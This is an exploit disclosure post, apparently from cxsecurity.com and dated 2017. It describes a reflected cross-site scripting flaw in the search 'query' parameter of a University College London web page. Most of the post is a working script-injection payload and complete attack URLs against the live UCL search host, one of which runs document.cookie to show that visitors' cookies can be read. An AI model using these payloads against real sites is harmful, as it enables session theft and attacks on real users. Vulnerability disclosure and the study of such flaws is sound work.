London's Global University Cross-Site-Scripting Vulnerability

Published
Credit
Risk
2017.04.22
4TT4CK3R
Low
CWE
CVE
Local
Remote
N/A
N/A
No
Yes

--------------------------
In the name of god
--------------------------

Exploit Title :
-------------------
London's Global University Cross-Site-Scripting Vulnerability


Exploit Author :
---------------------
4TT4CK3R


Date :
----------
2017/Apr/21


HomePage :
------------------
https://www.ucl.ac.uk


Vendor Page :
---------------------
https://www.ucl.ac.uk/maps/index.php


Parameter Name :
--------------------------
query


Description :
------------------
Our Script is :

""/>"certi"<script>alert("4TT4CK3R")</script>"/certi"

ok. Now we can insert this script for query parameter.

we will have :

http://search2.ucl.ac.uk/s/search.html?query=%22%22/%3E%22certi%22%3Cscript%3Ealert(%224TT4CK3R%22)%3C/script%3E%22/certi%22&collection=website-meta&profile=_website&tab=websites&submit=Go

and you can get cookies :

http://search2.ucl.ac.uk/s/search.html?query=%22%22/%3E%22certi%22%3Cscript%3Ealert(document.cookie)%3C/script%3E%22/certi%22&collection=website-meta&profile=_website&tab=websites&submit=Go

ok this university have a Cross-site-Scripting vulnerability!


ScreenShot :
------------------
http://uupload.ir/files/hxyn_1-1.png
http://uupload.ir/files/ufgl_2-2.png


Discovered and Exploited By:
----------------------------------------
4TT4CK3R

References:

http://uupload.ir/files/hxyn_1-1.png
http://uupload.ir/files/ufgl_2-2.png


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com